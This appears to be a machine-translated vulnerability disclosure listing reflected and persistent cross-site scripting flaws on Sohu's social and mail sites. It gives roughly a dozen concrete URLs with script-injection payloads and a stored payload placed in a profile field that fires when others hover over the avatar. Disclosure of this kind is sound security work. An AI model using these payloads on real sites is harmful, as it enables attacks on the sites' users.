My Sohu 9 remote reflective xss and Sohu mailbox remote reflective xss

Mainly http:// I .sohu.com/
Persistent and reflective xss9
Description: extended type:
Http:// I .sohu.com/app/friend/#/a/search/user/search/find.do? _ Input_encode = UTF-8 & nick = xsser
Reflected type:
Http:// I .sohu.com/a/register/passport/getNicks? Callback = test <script> alert (/goderci/) </script>
 
Http:// I .sohu.com/a/checkpassword/checkPassword? Xpt = & vn = test <script> alert (/goderci/) </script>
 
Http:// I .sohu.com/a/assistant/personal/get? Xpt = & _ = & vn = <script> alert (/goderci/) </script>
 
Http:// I .sohu.com/a/app/discuss/newcount.htm? Cb = "/> <script> alert (/goderci/) </script>
 
 
Http://stat. I .sohu.com/guest/count/count.do? Type = 0 & xpt = & callback = <script> alert (/goderci/) </script>
Http://ana.blog.sohu.com/blogcount? L = 1 & vn = <script> alert (/goderci/) </script> & _ =
 
Http://ow.blog.sohu.com/page/category.do? Action = recmdWidget & st = 0 & sz = 15 & vn = <script> alert (/goderci/) </script>
 
 
Http:// I .sohu.com/app/friend/#/a/search/user/search/find.do? Type = 4 & employer = % 22/% 3E % 3 Cscript % 3 Ealert % 28/goderci/% 29% 3C/script % 3E & _ input_encode = UTF-8
 
Persistent xss:
Set the unit name to <script> alert (/goderci/) </script>
 
 



 
Then it will be triggered whenever someone finds you and your mouse slide your Avatar!
 
 
 
Reflection xss:


Xss reflection in Sohu mailbox 3!
Detailed description:

Http://vip.sohu.com/push_mail.jsp? B = 126 "/> </script> <script> alert (/goderci/) </script> & t = 0
 
Http://wap.mail.sohu.com/push_mail.jsp? B = 126% 22/% 3E % 3C/script % 3E % 3 Cscript % 3 Ealert % 28/goderci/% 29% 3C/script % 3E & t = 0
 
Http://mail.sohu.com/push_mail.jsp? B = 126 "/> </script> <script> alert (/goderci/) </script> & t = 0


 
Solution: filter!

By goderci